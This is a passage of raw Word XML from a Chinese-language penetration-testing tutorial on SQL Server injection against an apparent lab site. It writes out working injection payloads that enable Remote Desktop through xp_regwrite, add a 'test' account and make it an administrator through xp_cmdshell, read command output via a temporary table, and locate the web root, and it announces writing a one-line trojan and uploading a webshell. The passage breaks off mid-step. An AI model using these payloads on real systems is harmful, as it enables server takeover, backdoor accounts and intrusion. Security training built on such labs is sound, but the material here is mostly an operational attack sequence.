        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.2.5.3</w:t>
      </w:r>
      <w:r w:rsidR="00F772E0" w:rsidRPr="00611C84">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用扩展存储开启远程终端</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48EB4076" w14:textId="77777777" w:rsidR="00F772E0" w:rsidRDefault="00F772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假如数据库服务器已经开启远终端服务，允许用户远程管理计算机，可以直接用存储过程执行系统命令添加一个管理员账号，即可登录服务器。</w:t>
      </w:r>
      <w:r w:rsidR="00196DAA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>如果没有开启，可直接使用以下命令开启（注0改1就是关闭）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0414DD04" w14:textId="77777777" w:rsidR="00196DAA" w:rsidRDefault="00196DA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196DAA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6F9661" w14:textId="77777777" w:rsidR="00196DAA" w:rsidRDefault="00196DAA" w:rsidP="00901209">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLine="420"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66E8DC5B" w14:textId="77777777" w:rsidR="00F772E0" w:rsidRPr="00764DAB" w:rsidRDefault="00F772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开始测试添加账户，在浏览器提交以下链接。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5A7617" w14:textId="77777777" w:rsidR="006705D7" w:rsidRPr="00764DAB" w:rsidRDefault="006705D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 xml:space="preserve">http://192.168.1.55/sqlserver/1.aspx?xxser=1;exec master..xp_cmdshell </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F70FA77" w14:textId="77777777" w:rsidR="006705D7" w:rsidRPr="00764DAB" w:rsidRDefault="006705D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net user test test /add'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C458437" w14:textId="77777777" w:rsidR="00F772E0" w:rsidRPr="00764DAB" w:rsidRDefault="00F772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上面是利用xp_cmdshell扩展存储，添加一个用户名和密码均为test的用户。再将此用户提升为管理员，提交如下链接。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41EE1BC8" w14:textId="77777777" w:rsidR="00F772E0" w:rsidRPr="00764DAB" w:rsidRDefault="00710329"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F772E0" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;exec master..xp_cmdshell 'net localgroup administrators test /add'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66AC8D6A" w14:textId="77777777" w:rsidR="00F772E0" w:rsidRPr="00764DAB" w:rsidRDefault="00F772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即可将test用户加入到管理员组。提交上面的链接时，</w:t>
      </w:r>
      <w:r w:rsidR="00A126C3" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>有的网站</w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>页面</w:t>
      </w:r>
      <w:r w:rsidR="00A126C3" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>会</w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>返回错误信息(图24)，不用管它，实际上用户是添加成功了的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B9F979" w14:textId="77777777" w:rsidR="00857EAD" w:rsidRDefault="00A126C3" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58630CB6" wp14:editId="6AEB7656">
            <wp:extent cx="5274310" cy="2571750"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="32" name="图片 31" descr="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7.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId83"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="2571750"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA441E3" w14:textId="77777777" w:rsidR="005B7C65" w:rsidRPr="00A126C3" w:rsidRDefault="005B7C65" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                                 图25</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5180A4BD" w14:textId="77777777" w:rsidR="00A126C3" w:rsidRPr="00611C84" w:rsidRDefault="00611C84" w:rsidP="001A202D">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.2.5.4</w:t>
      </w:r>
      <w:r w:rsidR="00A126C3" w:rsidRPr="00611C84">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看命令执行结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3CC97D"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上面的方法虽然执行了命令，但是看不到执行回显结果。可以通过创建一个临时表，将命令执行结果插入到临时表里面，然后读取临时表里面的内容，就从可看到回显结果了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0AB0A7" w14:textId="77777777" w:rsidR="00F7703A"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浏览器中依次提交如下链接</w:t>
      </w:r>
      <w:r w:rsidR="00F7703A" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，为了大家观看，在浏览器执行完命令之后，我们查看一下数据库看郊果(图26)。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3727D441" w14:textId="77777777" w:rsidR="00A126C3" w:rsidRPr="00764DAB" w:rsidRDefault="00ED2DF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D9435B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A126C3" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;drop table black;create Table black(result varchar(7996) null, id int not null identity (1,1))--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E06966F" w14:textId="77777777" w:rsidR="00A126C3" w:rsidRPr="00764DAB" w:rsidRDefault="00ED2DF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D9435B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A126C3" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;insert into black exec master..xp_cmdshell '</w:t>
      </w:r>
      <w:r w:rsidR="00BB5F08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>net user</w:t>
      </w:r>
      <w:r w:rsidR="00A126C3" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC5EB7B" w14:textId="77777777" w:rsidR="00A126C3" w:rsidRPr="00764DAB" w:rsidRDefault="00ED2DF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5B225F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> and (select resul</w:t>
      </w:r>
      <w:r w:rsidR="00A126C3" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>t from black where id=1)&gt;0--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE78848" w14:textId="77777777" w:rsidR="00F7703A" w:rsidRDefault="00434E55" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6627A160" wp14:editId="1966BB84">
            <wp:extent cx="5274310" cy="342794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274310" cy="3427944"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7963E747" w14:textId="77777777" w:rsidR="00434E55" w:rsidRPr="008638CE" w:rsidRDefault="00434E55" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                                图26</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08AC86AF"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将第三条查询中的“where id=1”依次更换后面的id值，可查询获取命令执行结果。这里提交到如下链接。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB78CAA" w14:textId="77777777" w:rsidR="00A126C3" w:rsidRPr="00764DAB" w:rsidRDefault="00434E55"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3D47F0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> and (select resul</w:t>
      </w:r>
      <w:r w:rsidR="00A126C3" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>t from black where id=16)&gt;0--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659C2C39" w14:textId="77777777" w:rsidR="00A126C3"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了网络配置信息中的IP地址(图</w:t>
      </w:r>
      <w:r w:rsidR="00F7703A" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00434E55" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33597813" w14:textId="77777777" w:rsidR="006C2B0D" w:rsidRPr="00764DAB" w:rsidRDefault="006C2B0D"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lastRenderedPageBreak/>
        <w:t>如果知道Web路径的情况下:</w:t>
      </w:r>
      <w:r w:rsidRPr="006C2B0D">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="444444"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="444444"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00D9435B" w:rsidRPr="00D9435B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>http://192.168.</w:t>
      </w:r>
      <w:r w:rsidR="00D9435B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00D9435B" w:rsidRPr="00D9435B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00D9435B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>55</w:t>
      </w:r>
      <w:r w:rsidR="00D9435B" w:rsidRPr="00D9435B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/sqlserver/1.aspx?xxser=1%20;exec%20master..xp_cmdshell%20'netstat%20-an%20&gt;&gt;c:\netstat.txt'--</w:t>
      </w:r>
      <w:r w:rsidRPr="006C2B0D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00103728">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>这样一下就看到了所有结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6043ED" w14:textId="77777777" w:rsidR="00434E55" w:rsidRDefault="00434E55" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1534700D" wp14:editId="17BB65F0">
            <wp:extent cx="5273238" cy="2905125"/>
            <wp:effectExtent l="19050" t="0" r="3612"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274310" cy="2905716"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1A9877" w14:textId="77777777" w:rsidR="003F182E" w:rsidRDefault="003F182E" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                                    图27</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5957DE00"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通过对比ping网站后得到的地址与注入点返回的IP地址信息，可知网站服务器与数据库服务器是同一主机。但是在使用远程桌面连接服务器时，连接超时无法成功，说明远程终端很可能被关闭了，或者更改了端口。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEC9EDD" w14:textId="77777777" w:rsidR="00A126C3" w:rsidRPr="00611C84" w:rsidRDefault="00611C84" w:rsidP="001A202D">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.2.5.5</w:t>
      </w:r>
      <w:r w:rsidR="00A126C3" w:rsidRPr="00611C84">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取当前</w:t>
      </w:r>
      <w:r w:rsidR="00A126C3" w:rsidRPr="00611C84">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidR="00A126C3" w:rsidRPr="00611C84">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0297373E" w14:textId="77777777" w:rsidR="00A126C3" w:rsidRPr="00764DAB" w:rsidRDefault="00A126C3"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虽然可以通过命令来开启远程终端，但是这比较麻烦，可以考虑执行sp_makewebtask写入一句话木马，再上传一个WebShell，利用WebShell更方便地执行各种命令操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2EE66A" w14:textId="77777777" w:rsidR="00A126C3"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将一句话木马写入到服务器磁盘，一般是写入Web目录，因此先要获得当前目录路径。再在浏览器中依次提交如下链接。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684A66BF" w14:textId="77777777" w:rsidR="002540EE" w:rsidRDefault="00D269A4"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pict w14:anchorId="0B42590B">
          <v:shape id="_x0000_s1030" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-15pt;margin-top:13.75pt;width:452.45pt;height:190.45pt;z-index:251662336">
            <v:textbox style="mso-next-textbox:#_x0000_s1030">
              <w:txbxContent>
                <w:p w14:paraId="5D9C4C93" w14:textId="77777777" w:rsidR="003756DA" w:rsidRDefault="003756DA" w:rsidP="002540EE">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第一种方法：</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="50328243" w14:textId="77777777" w:rsidR="003756DA" w:rsidRPr="00764DAB"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drop table black;create Table black(result varchar(7996) null, id int not null identity (1,1))--</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="3CBC27FF" w14:textId="77777777" w:rsidR="003756DA"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 xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r w:rsidRPr="002540EE">
                    <w:rPr>
                      <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
                      <w:kern w:val="0"/>
                      <w:szCs w:val="21"/>
                    </w:rPr>
                    <w:t>;insert into black exec master..xp_cmdshell 'dir /s c:\1.aspx'--</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="19572B72" w14:textId="77777777" w:rsidR="003756DA" w:rsidRPr="00764DAB"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kern w:val="0"/>
                      <w:szCs w:val="21"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> and (select resul</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00764DAB">
                    <w:rPr>
                      <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
                      <w:kern w:val="0"/>
                      <w:szCs w:val="21"/>
                    </w:rPr>
                    <w:t>t from black where id=1)&gt;0--</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="402A64AB" w14:textId="77777777" w:rsidR="003756DA" w:rsidRPr="002540EE" w:rsidRDefault="003756DA" w:rsidP="002540EE">
                  <w:pPr>
                    <w:ind w:firstLine="420"/>
                  </w:pPr>
                </w:p>
              </w:txbxContent>
            </v:textbox>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="09549012"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0C27BE7C"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6BC35A82"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407427A9"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432250BE"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16805467"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5432C2EA" w14:textId="77777777" w:rsidR="00F0269B" w:rsidRDefault="00F0269B" w:rsidP="00901209">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLine="420"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A6C807F" w14:textId="77777777" w:rsidR="00F0269B" w:rsidRDefault="00F0269B" w:rsidP="00901209">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLine="420"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F8A5AC8" w14:textId="77777777" w:rsidR="00F0269B" w:rsidRDefault="00D269A4"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pict w14:anchorId="0B5EBEF6">
          <v:shape id="_x0000_s1029" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-4.2pt;margin-top:-2.85pt;width:434.85pt;height:170.65pt;z-index:251661312">
            <v:textbox style="mso-next-textbox:#_x0000_s1029">
              <w:txbxContent>
                <w:p w14:paraId="771BA997" w14:textId="77777777" w:rsidR="003756DA" w:rsidRDefault="003756DA" w:rsidP="00F0269B">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第二种方法：</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="7B45EA55" w14:textId="77777777" w:rsidR="003756DA" w:rsidRDefault="003756DA" w:rsidP="00F0269B">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:adjustRightInd w:val="0"/>
                    <w:snapToGrid w:val="0"/>
                    <w:ind w:firstLine="420"/>
                    <w:textAlignment w:val="baseline"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="15"/>
                      <w:szCs w:val="15"/>
                      <w:shd w:val="clear" w:color="auto" w:fill="FEFEF2"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00764DAB">
                    <w:rPr>
                      <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
                      <w:kern w:val="0"/>
                      <w:szCs w:val="21"/>
                    </w:rPr>
                    <w:t>http://192.168.1.55/sqlserver/1.aspx?xxser=1;</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00CE15DD">
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="15"/>
                      <w:szCs w:val="15"/>
                      <w:shd w:val="clear" w:color="auto" w:fill="FEFEF2"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="15"/>
                      <w:szCs w:val="15"/>
                      <w:shd w:val="clear" w:color="auto" w:fill="FEFEF2"/>
                    </w:rPr>
                    <w:t>create table labeng(lala nvarchar(255)</w:t>
                  </w:r>
                  <w:r w:rsidRPr="004E668B">
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="15"/>
                      <w:szCs w:val="15"/>
                      <w:shd w:val="clear" w:color="auto" w:fill="FEFEF2"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> null, id int not null identity (1,1))--</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="443BAF0C" w14:textId="77777777" w:rsidR="003756DA" w:rsidRDefault="003756DA" w:rsidP="004E668B">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:adjustRightInd w:val="0"/>
                    <w:snapToGrid w:val="0"/>
                    <w:ind w:firstLine="420"/>
                    <w:textAlignment w:val="baseline"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="15"/>
                      <w:szCs w:val="15"/>
